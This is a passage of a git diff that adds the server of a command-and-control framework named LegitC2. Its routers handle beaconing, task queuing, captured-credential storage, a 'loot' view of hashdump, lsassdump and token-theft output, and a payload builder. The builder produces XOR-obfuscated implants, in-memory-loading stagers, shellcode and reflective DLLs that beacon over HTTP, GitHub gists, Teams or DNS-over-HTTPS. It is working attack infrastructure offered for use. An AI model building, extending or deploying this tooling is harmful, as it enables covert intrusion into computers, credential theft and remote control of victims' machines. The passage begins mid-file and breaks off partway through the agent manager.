upload + created_at: Mapped[datetime] = mapped_column(DateTime, default=datetime.utcnow) + sent_at: Mapped[Optional[datetime]] = mapped_column(DateTime, nullable=True) + acked_at: Mapped[Optional[datetime]] = mapped_column(DateTime, nullable=True) + + # "pending" | "sent" | "acked" | "error" + status: Mapped[str] = mapped_column(String(16), default="pending") + output: Mapped[str] = mapped_column(Text, default="") + + def to_dict(self) -> dict: + return { + "task_id": self.task_id, + "agent_id": self.agent_id, + "cmd": self.cmd, + "args": self.args, + "status": self.status, + "created_at": self.created_at.isoformat() if self.created_at else None, + "acked_at": self.acked_at.isoformat() if self.acked_at else None, + "output": self.output, + } + + def to_wire(self) -> dict: + """JSON payload sent to the agent (before encryption).""" + d = { + "t": "t", + "tid": self.task_id, + "c": self.cmd, + "a": self.args, + } + if self.data_b64: + d["d"] = self.data_b64 + return d diff --git a/server/models/user.py b/server/models/user.py new file mode 100644 index 0000000..10d5635 --- /dev/null +++ b/server/models/user.py @@ -0,0 +1,28 @@ +import hashlib, secrets +from sqlalchemy import String, Boolean +from sqlalchemy.orm import mapped_column, Mapped +from models.agent import Base + + +class User(Base): + __tablename__ = "users" + + username: Mapped[str] = mapped_column(String(64), primary_key=True) + password_hash: Mapped[str] = mapped_column(String(256), default="") + role: Mapped[str] = mapped_column(String(16), default="operator") + is_active: Mapped[bool] = mapped_column(Boolean, default=True) + + @staticmethod + def hash_password(password: str) -> str: + salt = secrets.token_hex(16) + dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 260_000) + return f"{salt}:{dk.hex()}" + + @staticmethod + def verify_password(password: str, stored: str) -> bool: + try: + salt, dk_hex = stored.split(":", 1) + dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 260_000) + return secrets.compare_digest(dk.hex(), dk_hex) + except Exception: + return False diff --git a/server/requirements.txt b/server/requirements.txt new file mode 100644 index 0000000..52baef6 --- /dev/null +++ b/server/requirements.txt @@ -0,0 +1,9 @@ +fastapi==0.115.0 +uvicorn[standard]==0.29.0 +sqlalchemy==2.0.36 +pyjwt==2.8.0 +cryptography==42.0.5 +httpx==0.27.0 +pyyaml==6.0.1 +pydantic==2.11.0 +dnslib==0.9.24 diff --git a/server/routers/__init__.py b/server/routers/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/server/routers/agents.py b/server/routers/agents.py new file mode 100644 index 0000000..de6e527 --- /dev/null +++ b/server/routers/agents.py @@ -0,0 +1,117 @@ +""" +GET /agents — list all agents +GET /agents/{id} — single agent details +PATCH /agents/{id} — update mutable fields (tags) +DELETE /agents/{id} — mark agent inactive (does not kill it) +POST /agents/killall — queue kill task for all active agents (admin) +""" +from typing import Optional + +from fastapi import APIRouter, Depends, HTTPException +from pydantic import BaseModel +from sqlalchemy.orm import Session + +from routers.auth import verify_token, verify_admin +from models.agent import Agent +from database import get_db + +router = APIRouter(prefix="/agents", tags=["agents"]) + + +class PatchAgentRequest(BaseModel): + tags: Optional[str] = None + + +@router.get("") +async def list_agents( + db: Session = Depends(get_db), + _user: str = Depends(verify_token), +): + agents = db.query(Agent).order_by(Agent.last_seen.desc()).all() + return [a.to_dict() for a in agents] + + +@router.get("/graph") +async def get_graph( + db: Session = Depends(get_db), + _user: str = Depends(verify_token), +): + agents = db.query(Agent).all() + return { + "nodes": [a.to_dict() for a in agents], + "edges": [{"source": a.agent_id, "target": a.parent_id} + for a in agents if a.parent_id], + } + + +@router.get("/{agent_id}") +async def get_agent( + agent_id: str, + db: Session = Depends(get_db), + _user: str = Depends(verify_token), +): + agent = db.get(Agent, agent_id) + if not agent: + raise HTTPException(status_code=404, detail="Agent not found") + return agent.to_dict() + + +@router.patch("/{agent_id}") +async def patch_agent( + agent_id: str, + body: PatchAgentRequest, + db: Session = Depends(get_db), + _user: str = Depends(verify_token), +): + agent = db.get(Agent, agent_id) + if not agent: + raise HTTPException(status_code=404, detail="Agent not found") + if body.tags is not None: + agent.tags = body.tags + db.commit() + db.refresh(agent) + return agent.to_dict() + + +@router.post("/killall") +async def kill_all_agents( + db: Session = Depends(get_db), + _admin: str = Depends(verify_admin), +): + """Queue a self-kill task for every active agent with a completed handshake.""" + import uuid as _uuid + from models.task import Task + + active = db.query(Agent).filter( + Agent.is_active == True, Agent.handshake_done == True # noqa: E712 + ).all() + + count = 0 + for a in active: + task = Task( + task_id = str(_uuid.uuid4()), + agent_id = a.agent_id, + cmd = "kill", + args = "self", + status = "pending", + ) + a.is_active = False + db.add(task) + count += 1 + + db.commit() + return {"killed": count} + + +@router.delete("/{agent_id}") +async def remove_agent( + agent_id: str, + db: Session = Depends(get_db), + _user: str = Depends(verify_token), +): + agent = db.get(Agent, agent_id) + if not agent: + raise HTTPException(status_code=404, detail="Agent not found") + agent.is_active = False + db.commit() + return {"status": "deactivated", "agent_id": agent_id} diff --git a/server/routers/auth.py b/server/routers/auth.py new file mode 100644 index 0000000..5abdda4 --- /dev/null +++ b/server/routers/auth.py @@ -0,0 +1,166 @@ +""" +JWT authentication for the operator UI. +POST /auth/login → access_token +GET /auth/me → {username, role} +GET /auth/users → list (admin only) +POST /auth/users → create user (admin only) +DELETE /auth/users/{uname} → delete user (admin only) +""" +import os +from datetime import datetime, timedelta + +import jwt +from fastapi import APIRouter, HTTPException, Depends +from fastapi.security import HTTPBearer, HTTPAuthorizationCredentials +from pydantic import BaseModel +from sqlalchemy.orm import Session + +import database +from models.user import User + +router = APIRouter(prefix="/auth", tags=["auth"]) +bearer = HTTPBearer() + +_SECRET: str = "" +_ALGO = "HS256" +_TOKEN_TTL_H = 12 + + +def _get_secret() -> str: + global _SECRET + if not _SECRET: + _SECRET = os.environ.get("KHAOS_JWT_SECRET", + os.environ.get("LEGITC2_JWT_SECRET", "change-me-in-production")) + return _SECRET + + +# ---- Pydantic models ---- + +class LoginRequest(BaseModel): + username: str + password: str + +class TokenResponse(BaseModel): + access_token: str + token_type: str = "bearer" + +class CreateUserRequest(BaseModel): + username: str + password: str + role: str = "operator" + + +# ---- Token helpers ---- + +def create_token(username: str, role: str = "operator") -> str: + payload = { + "sub": username, + "role": role, + "iat": datetime.utcnow(), + "exp": datetime.utcnow() + timedelta(hours=_TOKEN_TTL_H), + } + return jwt.encode(payload, _get_secret(), algorithm=_ALGO) + + +def _decode(raw: str) -> dict: + try: + return jwt.decode(raw, _get_secret(), algorithms=[_ALGO]) + except jwt.ExpiredSignatureError: + raise HTTPException(status_code=401, detail="Token expired") + except jwt.PyJWTError: + raise HTTPException(status_code=401, detail="Invalid token") + + +def verify_token(credentials: HTTPAuthorizationCredentials = Depends(bearer)) -> str: + """Returns username. Used by existing agent/task routers unchanged.""" + return _decode(credentials.credentials)["sub"] + + +def verify_admin(credentials: HTTPAuthorizationCredentials = Depends(bearer)) -> str: + """Returns username, 403 if role != admin.""" + payload = _decode(credentials.credentials) + if payload.get("role") != "admin": + raise HTTPException(status_code=403, detail="Admin access required") + return payload["sub"] + + +def verify_token_str(token: str) -> str: + """JWT validation for WebSocket connections (token passed as query param).""" + try: + payload = jwt.decode(token, _get_secret(), algorithms=[_ALGO]) + return payload["sub"] + except jwt.ExpiredSignatureError: + raise ValueError("Token expired") + except jwt.PyJWTError: + raise ValueError("Invalid token") + + +# ---- Routes ---- + +@router.post("/login", response_model=TokenResponse) +async def login(body: LoginRequest, db: Session = Depends(database.get_db)): + user = db.get(User, body.username) + if user and user.is_active and User.verify_password(body.password, user.password_hash): + return TokenResponse(access_token=create_token(user.username, user.role)) + + # Fallback to env-var credentials (only if no users exist in DB) + if db.query(User).count() == 0: + env_user = os.environ.get("LEGITC2_OPERATOR_USER", "operator") + env_pass = os.environ.get("LEGITC2_OPERATOR_PASS", "changeme") + if body.username == env_user and body.password == env_pass: + return TokenResponse(access_token=create_token(env_user, "admin")) + + raise HTTPException(status_code=401, detail="Invalid credentials") + + +@router.get("/me") +async def me(credentials: HTTPAuthorizationCredentials = Depends(bearer)): + payload = _decode(credentials.credentials) + return {"username": payload["sub"], "role": payload.get("role", "operator")} + + +@router.get("/users") +async def list_users( + _admin: str = Depends(verify_admin), + db: Session = Depends(database.get_db), +): + return [ + {"username": u.username, "role": u.role, "is_active": u.is_active} + for u in db.query(User).order_by(User.username).all() + ] + + +@router.post("/users", status_code=201) +async def create_user( + body: CreateUserRequest, + _admin: str = Depends(verify_admin), + db: Session = Depends(database.get_db), +): + if body.role not in ("admin", "operator"): + raise HTTPException(status_code=400, detail="role must be 'admin' or 'operator'") + if db.get(User, body.username): + raise HTTPException(status_code=409, detail="User already exists") + user = User( + username=body.username, + password_hash=User.hash_password(body.password), + role=body.role, + is_active=True, + ) + db.add(user) + db.commit() + return {"username": user.username, "role": user.role} + + +@router.delete("/users/{username}", status_code=204) +async def delete_user( + username: str, + admin: str = Depends(verify_admin), + db: Session = Depends(database.get_db), +): + if username == admin: + raise HTTPException(status_code=400, detail="Cannot delete yourself") + user = db.get(User, username) + if not user: + raise HTTPException(status_code=404, detail="User not found") + db.delete(user) + db.commit() diff --git a/server/routers/beacon.py b/server/routers/beacon.py new file mode 100644 index 0000000..1abd181 --- /dev/null +++ b/server/routers/beacon.py @@ -0,0 +1,78 @@ +""" +POST /beacon — direct HTTP beacon endpoint. +""" +from __future__ import annotations +from typing import Optional +from fastapi import APIRouter, Depends, Request +from pydantic import BaseModel +from sqlalchemy.orm import Session + +from services.agent_manager import manager as agent_manager +from services.ws_manager import ws_manager +from models.log import Log +from database import get_db + +import logging as _logging +_blog = _logging.getLogger("beacon") + +router = APIRouter(tags=["beacon"]) + + +class BeaconRequest(BaseModel): + id: str + p: str + + +class BeaconResponse(BaseModel): + p: Optional[str] = None + + +@router.post("/beacon", response_model=BeaconResponse) +async def post_beacon(request: Request, body: BeaconRequest, db: Session = Depends(get_db)): + agent_id = body.id + b64_pkt = body.p + + import base64, json + try: + raw = base64.b64decode(b64_pkt) + decoded = json.loads(raw.decode()) + pkt_type = decoded.get("t", "") + except Exception as _e: + pkt_type = "encrypted" + _blog.debug("pkt decode: agent=%s type=encrypted (%s)", agent_id, _e) + + _blog.info("beacon: agent=%s pkt_type=%s", agent_id, pkt_type) + + if pkt_type == "h": + result = agent_manager.process_handshake(b64_pkt, db) + for event in result.get("events", []): + await ws_manager.broadcast(event) + return BeaconResponse(p=result.get("response")) + + client_ip = ( + request.headers.get("X-Forwarded-For", "").split(",")[0].strip() + or (request.client.host if request.client else "") + ) + result = agent_manager.process_beacon(agent_id, b64_pkt, db, client_ip=client_ip) + for event in result.get("events", []): + await ws_manager.broadcast(event) + + # Only dispatch tasks when the beacon was successfully decrypted. + # process_beacon always appends "agent_seen" on success; empty events + # means the decrypt failed — don't mark tasks "sent" in that case. + beacon_ok = any(e.get("type") == "agent_seen" for e in result.get("events", [])) + if not beacon_ok: + return BeaconResponse(p=None) + + db.add(Log(agent_id=agent_id, event="beacon_checkin", detail="ok")) + db.commit() + + task_pkt = agent_manager.get_pending_task_packet(agent_id, db) + if task_pkt: + return BeaconResponse(p=task_pkt) + + session = agent_manager.get_session(agent_id) + if session and session.crypto.ready: + return BeaconResponse(p=session.crypto.seal_json({"t": "n"})) + + return BeaconResponse(p=None) diff --git a/server/routers/build.py b/server/routers/build.py new file mode 100644 index 0000000..f4a99f1 --- /dev/null +++ b/server/routers/build.py @@ -0,0 +1,285 @@ +""" +POST /api/build — payload builder (admin only). + +output = "standalone" → agent.exe (direct beacon, no stager) +output = "stager" → stager.exe (downloads + in-memory loads agent.exe) + also registers the encrypted stage at /api/stage/ +""" +from __future__ import annotations +import asyncio +import os +import sys +import secrets +import subprocess +from datetime import datetime, timezone + +from fastapi import APIRouter, Depends, HTTPException +from fastapi.responses import FileResponse, Response +from pydantic import BaseModel + +from routers.auth import verify_admin + +router = APIRouter(tags=["build"]) + +_build_lock = asyncio.Lock() + +# XOR key — must match agent/tools/obfuscate.py and gen_stager_config.py +_XOR_KEY = b"\x7a\x3f\x91\xc4\x52\x88\xb1\xde\xad\xbe\xef\x13\x37\xca\xfe\x42" +_XOR_KEY_LEN = len(_XOR_KEY) + +_SERVER_DIR = os.path.dirname(os.path.dirname(__file__)) +_AGENT_DIR = os.path.normpath(os.path.join(_SERVER_DIR, "..", "agent")) +_MAKE_EXE = "C:/msys64/mingw64/bin/mingw32-make.exe" +_PYTHON_EXE = sys.executable +_AGENT_EXE = os.path.join(_AGENT_DIR, "agent.exe") +_STAGER_EXE = os.path.join(_AGENT_DIR, "stager.exe") +_CONFIG_H = os.path.join(_AGENT_DIR, "include", "agent_config.h") + + +class BuildRequest(BaseModel): + output: str = "standalone" # standalone | stager + channel: str = "http" # http | github | doh + beacon_url: str = "" + stage_server_url: str = "" # base URL for stager stage download (stager only) + beacon_interval: int = 30000 + jitter_pct: int = 40 + kill_date: str = "" + github_token: str = "" + gist_cmd: str = "" + gist_out: str = "" + doh_domain: str = "" + teams_tenant: str = "" + teams_client: str = "" + teams_secret: str = "" + teams_webhook: str = "" + teams_team_id: str = "" + teams_channel: str = "" + http_useragent: str = "" # custom UA; empty = random rotation + http_extra_headers: str = "" # extra HTTP headers, newline-delimited + http_cert_pin: str = "" # SHA-256 hex fingerprint of server leaf cert + + +# ---- XOR / header generation helpers ---- + +def _xor_encode(data: bytes) -> list[int]: + return [b ^ _XOR_KEY[i % _XOR_KEY_LEN] for i, b in enumerate(data)] + + +def _emit(name: str, value: str) -> str: + if not value: + return ( + f"/* {name}: not configured */\n" + f"static const unsigned char CFG_{name}[] = {{0x00}};\n" + f"#define CFG_{name}_LEN 0\n\n" + ) + enc = _xor_encode(value.encode()) + arr = ", ".join(f"0x{b:02x}" for b in enc) + preview = value[:32] + ("…" if len(value) > 32 else "") + return ( + f"/* {name} — XOR-encoded ({len(enc)} bytes) */\n" + f"/* plaintext preview: {preview!r} */\n" + f"static const unsigned char CFG_{name}[] = {{{arr}, 0x00}};\n" + f"#define CFG_{name}_LEN {len(enc)}\n\n" + ) + + +def _generate_agent_config_h(req: BuildRequest) -> str: + kill_ts = "0" + if req.kill_date: + try: + dt = datetime.strptime(req.kill_date, "%Y-%m-%d").replace(tzinfo=timezone.utc) + kill_ts = str(int(dt.timestamp())) + except ValueError: + pass + + key_hex = ", ".join(f"0x{b:02x}" for b in _XOR_KEY) + h = ( + "/* AUTO-GENERATED by LegitC2 payload builder — do not edit manually. */\n" + "#ifndef AGENT_CONFIG_H\n" + "#define AGENT_CONFIG_H\n\n" + f"#define CFG_XOR_KEY_LEN {_XOR_KEY_LEN}\n" + f"static const unsigned char CFG_XOR_KEY[{_XOR_KEY_LEN}] = {{ {key_hex} }};\n\n" + ) + # Normalise extra headers: convert bare \n to \r\n for WinHTTP + extra_hdrs = req.http_extra_headers.replace("\r\n", "\n").replace("\n", "\r\n") + if extra_hdrs and not extra_hdrs.endswith("\r\n"): + extra_hdrs += "\r\n" + + values: dict[str, str] = { + "GITHUB_TOKEN": req.github_token if req.channel == "github" else "", + "GIST_CMD_ID": req.gist_cmd if req.channel == "github" else "", + "GIST_OUT_ID": req.gist_out if req.channel == "github" else "", + "TEAMS_TENANT": req.teams_tenant if req.channel == "teams" else "", + "TEAMS_CLIENT": req.teams_client if req.channel == "teams" else "", + "TEAMS_SECRET": req.teams_secret if req.channel == "teams" else "", + "TEAMS_WEBHOOK": req.teams_webhook if req.channel == "teams" else "", + "TEAMS_TEAM_ID": req.teams_team_id if req.channel == "teams" else "", + "TEAMS_CHANNEL": req.teams_channel if req.channel == "teams" else "", + "BEACON_URL": req.beacon_url if req.channel == "http" else "", + "DOH_DOMAIN": req.doh_domain if req.channel == "doh" else "", + "KILL_DATE": kill_ts, + "HTTP_USERAGENT": req.http_useragent, + "HTTP_EXTRA_HEADERS": extra_hdrs if req.channel == "http" else "", + "CERT_PIN": req.http_cert_pin.strip().lower() if req.channel == "http" else "", + } + for name, value in values.items(): + h += _emit(name, value) + h += "#endif /* AGENT_CONFIG_H */\n" + return h + + +# ---- Make helpers ---- + +def _make(target: str, timeout: int = 120, env: dict | None = None) -> subprocess.CompletedProcess: + return subprocess.run( + [_MAKE_EXE, "-C", _AGENT_DIR, target], + capture_output=True, text=True, timeout=timeout, + env={**os.environ, **(env or {})}, + ) + + +# ---- ChaCha20-Poly1305 (Python, for encrypting the stage on the server) ---- + +def _encrypt_stage(pe_bytes: bytes) -> tuple[bytes, str]: + """Encrypt agent.exe with a fresh random key. Returns (blob, key_hex).""" + from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305 + key = secrets.token_bytes(32) + nonce = secrets.token_bytes(12) + aead = ChaCha20Poly1305(key) + ct = aead.encrypt(nonce, pe_bytes, None) # ct includes tag + blob = nonce + ct # nonce(12) | ciphertext | tag(16) + return blob, key.hex() + + +# ---- Endpoint ---- + +@router.post("/build") +async def build_payload(req: BuildRequest, _: str = Depends(verify_admin)): + if _build_lock.locked(): + raise HTTPException(503, "Build already in progress — try again in a moment") + + async with _build_lock: + # Step 1: write agent_config.h + compile agent.exe + try: + with open(_CONFIG_H, "w", encoding="utf-8") as f: + f.write(_generate_agent_config_h(req)) + except OSError as e: + raise HTTPException(500, f"Config write failed: {e}") + + try: + r_cfg = _make("config") + except FileNotFoundError: + raise HTTPException(500, "make not found — MSYS2 required at C:/msys64") + if r_cfg.returncode != 0: + raise HTTPException(500, f"Config gen failed:\n{(r_cfg.stderr or r_cfg.stdout)[-1000:]}") + + try: + r = _make("build-only") + except FileNotFoundError: + raise HTTPException(500, "make not found — MSYS2 required at C:/msys64") + except subprocess.TimeoutExpired: + raise HTTPException(500, "Agent compile timed out") + + if r.returncode != 0: + raise HTTPException(500, f"Agent compile failed:\n{(r.stderr or r.stdout)[-2000:]}") + if not os.path.exists(_AGENT_EXE): + raise HTTPException(500, "agent.exe not found after build") + + # --- Shellcode: convert agent.exe → agent.bin via donut --- + if req.output == "shellcode": + sc_path = os.path.join(_AGENT_DIR, "agent.bin") + pe2sc = os.path.join(_AGENT_DIR, "tools", "pe2sc.py") + try: + r_sc = subprocess.run( + [_PYTHON_EXE, pe2sc, _AGENT_EXE, sc_path], + capture_output=True, text=True, timeout=120, + ) + except subprocess.TimeoutExpired: + raise HTTPException(500, "Shellcode conversion timed out") + if r_sc.returncode != 0: + detail = (r_sc.stderr or r_sc.stdout or "unknown error")[-2000:] + raise HTTPException(500, f"Shellcode conversion failed:\n{detail}\n\nTip: pip install donut-shellcode") + if not os.path.exists(sc_path): + raise HTTPException(500, "agent.bin not found after shellcode conversion") + return FileResponse( + sc_path, + media_type="application/octet-stream", + filename="agent.bin", + headers={"Content-Disposition": 'attachment; filename="agent.bin"'}, + ) + + # --- Reflective DLL: compile agent.dll with custom ReflectiveLoader --- + if req.output == "reflective_dll": + dll_path = os.path.join(_AGENT_DIR, "agent.dll") + try: + r_dll = subprocess.run( + [_MAKE_EXE, "-C", _AGENT_DIR, "reflective-dll-only"], + capture_output=True, text=True, timeout=120, + ) + except subprocess.TimeoutExpired: + raise HTTPException(500, "Reflective DLL compile timed out") + if r_dll.returncode != 0: + detail = (r_dll.stderr or r_dll.stdout or "unknown error")[-2000:] + raise HTTPException(500, f"Reflective DLL compile failed:\n{detail}") + if not os.path.exists(dll_path): + raise HTTPException(500, "agent.dll not found after build") + return FileResponse( + dll_path, + media_type="application/octet-stream", + filename="agent.dll", + headers={"Content-Disposition": 'attachment; filename="agent.dll"'}, + ) + + # --- Standalone: return agent.exe directly --- + if req.output != "stager": + return FileResponse( + _AGENT_EXE, + media_type="application/octet-stream", + filename="agent.exe", + headers={"Content-Disposition": 'attachment; filename="agent.exe"'}, + ) + + # --- Stager: encrypt agent.exe, build stager.exe --- + with open(_AGENT_EXE, "rb") as f: + pe_bytes = f.read() + + blob, key_hex = _encrypt_stage(pe_bytes) + + # Generate single-use download token + register stage + token = secrets.token_hex(32) + base = req.stage_server_url.rstrip("/") or "http://127.0.0.1:8000" + stage_url = f"{base}/api/stage/{token}" + + # Generate stager_config.h + gen_script = os.path.join(_AGENT_DIR, "tools", "gen_stager_config.py") + try: + r2 = subprocess.run( + [_PYTHON_EXE, gen_script, "--url", stage_url, "--key", key_hex], + capture_output=True, text=True, timeout=15, + ) + except Exception as e: + raise HTTPException(500, f"gen_stager_config failed: {e}") + if r2.returncode != 0: + raise HTTPException(500, f"gen_stager_config error:\n{r2.stderr}") + + # Compile stager + try: + r3 = _make("stager-only") + except subprocess.TimeoutExpired: + raise HTTPException(500, "Stager compile timed out") + + if r3.returncode != 0: + raise HTTPException(500, f"Stager compile failed:\n{(r3.stderr or r3.stdout)[-2000:]}") + if not os.path.exists(_STAGER_EXE): + raise HTTPException(500, "stager.exe not found after build") + + # Register encrypted stage so GET /api/stage/ can serve it + from routers.stage import register_stage + register_stage(token, blob) + + return FileResponse( + _STAGER_EXE, + media_type="application/octet-stream", + filename="stager.exe", + headers={"Content-Disposition": 'attachment; filename="stager.exe"'}, + ) diff --git a/server/routers/creds.py b/server/routers/creds.py new file mode 100644 index 0000000..6deb58e --- /dev/null +++ b/server/routers/creds.py @@ -0,0 +1,76 @@ +""" +POST /api/creds — save a credential +GET /api/creds — list creds (optional ?agent_id=) +DELETE /api/creds/{id} — delete a credential +""" +from __future__ import annotations +import uuid +from datetime import datetime +from typing import Optional + +from fastapi import APIRouter, Depends, HTTPException +from pydantic import BaseModel +from sqlalchemy.orm import Session + +from routers.auth import verify_token +from models.cred import Cred +from database import get_db + +router = APIRouter(tags=["creds"]) + + +class CredRequest(BaseModel): + agent_id: str = "" + cred_type: str = "cleartext" # cleartext | hash | token | kerberos + username: str + secret: str = "" + host: str = "" + note: str = "" + + +@router.post("/creds") +async def create_cred( + body: CredRequest, + db: Session = Depends(get_db), + _: str = Depends(verify_token), +): + cred = Cred( + cred_id = str(uuid.uuid4()), + agent_id = body.agent_id, + cred_type = body.cred_type, + username = body.username, + secret = body.secret, + host = body.host, + note = body.note, + captured_at = datetime.utcnow(), + ) + db.add(cred) + db.commit() + db.refresh(cred) + return cred.to_dict() + + +@router.get("/creds") +async def list_creds( + agent_id: Optional[str] = None, + db: Session = Depends(get_db), + _: str = Depends(verify_token), +): + q = db.query(Cred).order_by(Cred.captured_at.desc()) + if agent_id: + q = q.filter(Cred.agent_id == agent_id) + return [c.to_dict() for c in q.all()] + + +@router.delete("/creds/{cred_id}") +async def delete_cred( + cred_id: str, + db: Session = Depends(get_db), + _: str = Depends(verify_token), +): + cred = db.get(Cred, cred_id) + if not cred: + raise HTTPException(status_code=404, detail="Credential not found") + db.delete(cred) + db.commit() + return {"status": "deleted", "cred_id": cred_id} diff --git a/server/routers/stage.py b/server/routers/stage.py new file mode 100644 index 0000000..353b6dd --- /dev/null +++ b/server/routers/stage.py @@ -0,0 +1,51 @@ +""" +GET /api/stage/{token} — serve encrypted stage to stager. + +Wire format: nonce(12) | ciphertext | tag(16) [ChaCha20-Poly1305] +Token is a 64-char hex string stored in the in-memory registry below. +Tokens expire after 24 h and are single-use. +""" +from __future__ import annotations +import os +import time +from typing import Optional + +from fastapi import APIRouter, HTTPException +from fastapi.responses import Response + +router = APIRouter(tags=["stage"]) + +# token (hex64) → {"blob": bytes, "expires": float} +_stages: dict[str, dict] = {} +_TTL = 86400 # 24 h + + +def register_stage(token: str, blob: bytes) -> None: + """Called by build.py after encrypting agent.exe.""" + _stages[token] = {"blob": blob, "expires": time.time() + _TTL} + _evict() + + +def _evict() -> None: + now = time.time() + dead = [t for t, v in _stages.items() if v["expires"] < now] + for t in dead: + del _stages[t] + + +@router.get("/api/stage/{token}") +async def get_stage(token: str): + _evict() + entry = _stages.get(token) + if not entry: + raise HTTPException(404, "stage not found or expired") + + blob = entry["blob"] + # Single-use: remove after serving + del _stages[token] + + return Response( + content=blob, + media_type="application/octet-stream", + headers={"Cache-Control": "no-store"}, + ) diff --git a/server/routers/tasks.py b/server/routers/tasks.py new file mode 100644 index 0000000..939debe --- /dev/null +++ b/server/routers/tasks.py @@ -0,0 +1,204 @@ +""" +POST /agents/{id}/task — queue a command for an agent +GET /agents/{id}/output — get output of last completed task +GET /agents/{id}/tasks — list all tasks for an agent +GET /logs — full audit log +""" +import base64 +import io +import uuid +from datetime import datetime +from typing import Optional + +from fastapi import APIRouter, Depends, HTTPException +from pydantic import BaseModel +from sqlalchemy.orm import Session + +from routers.auth import verify_token +from models.agent import Agent +from models.task import Task +from models.log import Log +from database import get_db + +try: + from PIL import Image as _PILImage, ImageFile as _PILImageFile + _PILImageFile.LOAD_TRUNCATED_IMAGES = True + _HAS_PIL = True +except ImportError: + _HAS_PIL = False + + +def _extract_b64(raw: str) -> str: + """Strip '[screenshot] WxH\n' header if present, return raw b64.""" + if raw and raw.startswith('[screenshot] ') and '\n' in raw: + return raw.split('\n', 1)[1].strip() + return (raw or '').strip() + + +def _bmp_b64_to_png_b64(raw: str) -> str: + """Convert BMP base64 → PNG base64 using Pillow. + Falls back to the raw BMP base64 if PIL is unavailable or conversion fails.""" + b64 = _extract_b64(raw) + if not _HAS_PIL or not b64: + return b64 + try: + bmp_bytes = base64.b64decode(b64) + img = _PILImage.open(io.BytesIO(bmp_bytes)) + out = io.BytesIO() + img.save(out, format='PNG', optimize=False) + return base64.b64encode(out.getvalue()).decode() + except Exception: + return b64 # fallback to BMP base64 + +router = APIRouter(tags=["tasks"]) + + +# ---- Request / Response models ---- + +class TaskRequest(BaseModel): + cmd: str + args: str = "" + data_b64: str = "" # base64 file content for upload command + + +class TaskResponse(BaseModel): + task_id: str + agent_id: str + cmd: str + args: str + status: str + + +# ---- Routes ---- + +@router.post("/agents/{agent_id}/task", response_model=TaskResponse) +async def create_task( + agent_id: str, + body: TaskRequest, + db: Session = Depends(get_db), + _user: str = Depends(verify_token), +): + agent = db.get(Agent, agent_id) + if not agent: + raise HTTPException(status_code=404, detail="Agent not found") + if not agent.handshake_done: + raise HTTPException(status_code=409, detail="Agent handshake not complete") + + task = Task( + task_id = str(uuid.uuid4()), + agent_id = agent_id, + cmd = body.cmd, + args = body.args, + data_b64 = body.data_b64, + status = "pending", + ) + log = Log(agent_id=agent_id, event="task_created", + detail=f"cmd={body.cmd} args={body.args[:64]}") + db.add(task) + db.add(log) + db.commit() + db.refresh(task) + + return TaskResponse( + task_id = task.task_id, + agent_id = task.agent_id, + cmd = task.cmd, + args = task.args, + status = task.status, + ) + + +@router.get("/agents/{agent_id}/output") +async def get_output( + agent_id: str, + db: Session = Depends(get_db), + _user: str = Depends(verify_token), +): + """Return the most recently ACK'd task with its output.""" + task = ( + db.query(Task) + .filter(Task.agent_id == agent_id, Task.status == "acked") + .order_by(Task.acked_at.desc()) + .first() + ) + if not task: + return {"output": None} + return task.to_dict() + + +@router.get("/agents/{agent_id}/tasks") +async def list_tasks( + agent_id: str, + db: Session = Depends(get_db), + _user: str = Depends(verify_token), +): + tasks = ( + db.query(Task) + .filter(Task.agent_id == agent_id) + .order_by(Task.created_at.desc()) + .limit(100) + .all() + ) + return [t.to_dict() for t in tasks] + + +@router.get("/tasks/{task_id}") +async def get_task( + task_id: str, + db: Session = Depends(get_db), + _user: str = Depends(verify_token), +): + task = db.get(Task, task_id) + if not task: + raise HTTPException(status_code=404, detail="Task not found") + return task.to_dict() + + +_LOOT_CMDS = ('hashdump', 'lsassdump', 'steal_token', 'make_token', 'getsystem', 'download', 'kerberos') + + +@router.get("/screenshots") +async def get_screenshots( + limit: int = 100, + agent_id: Optional[str] = None, + db: Session = Depends(get_db), + _user: str = Depends(verify_token), +): + q = db.query(Task).filter(Task.cmd == "screenshot", Task.status == "acked", Task.output != "") + if agent_id: + q = q.filter(Task.agent_id == agent_id) + tasks = q.order_by(Task.acked_at.desc()).limit(limit).all() + return [ + {"task_id": t.task_id, "agent_id": t.agent_id, + "acked_at": t.acked_at.isoformat() if t.acked_at else None, + "output": _bmp_b64_to_png_b64(t.output), + "mime": "image/png" if _HAS_PIL else "image/bmp"} + for t in tasks + ] + + +@router.get("/loot") +async def get_loot( + agent_id: Optional[str] = None, + db: Session = Depends(get_db), + _user: str = Depends(verify_token), +): + q = db.query(Task).filter(Task.cmd.in_(_LOOT_CMDS), Task.status == "acked", Task.output != "") + if agent_id: + q = q.filter(Task.agent_id == agent_id) + tasks = q.order_by(Task.acked_at.desc()).limit(500).all() + return [t.to_dict() for t in tasks] + + +@router.get("/logs") +async def get_logs( + agent_id: Optional[str] = None, + limit: int = 200, + db: Session = Depends(get_db), + _user: str = Depends(verify_token), +): + q = db.query(Log) + if agent_id: + q = q.filter(Log.agent_id == agent_id) + logs = q.order_by(Log.created_at.desc()).limit(limit).all() + return [l.to_dict() for l in logs] diff --git a/server/services/__init__.py b/server/services/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/server/services/agent_manager.py b/server/services/agent_manager.py new file mode 100644 index 0000000..fe5ee5a --- /dev/null +++ b/server/services/agent_manager.py @@ -0,0 +1,254 @@ +""" +In-memory session registry for live agents. +Backed by SQLite via SQLAlchemy for persistence across server restarts. +""" +import base64 +import json +from datetime import datetime, timedelta +from typing import Optional + +from sqlalchemy.orm import Session as DBSession + +from models.agent import Agent +from models.log import Log +from models.task import Task +from services.crypto import AgentCrypto, decode_handshake_packet, build_handshake_response + + +class AgentSession: + """Runtime state for one agent (not persisted, rebuilt from DB on restart).""" + + def __init__(self, agent_id: str): + self.agent_id = agent_id + self.crypto = AgentCrypto() + self.last_seen: Optional[datetime] = None + + @classmethod + def from_db(cls, db_agent: Agent) -> "AgentSession": + session = cls(db_agent.agent_id) + if db_agent.server_privkey and db_agent.session_key: + session.crypto.load_from_hex(db_agent.server_privkey, db_agent.session_key) + session.last_seen = db_agent.last_seen + return session + + +class AgentManager: + def __init__(self): + # agent_id → AgentSession + self._sessions: dict[str, AgentSession] = {} + + # ---- Session lookup / creation ---- + + def get_session(self, agent_id: 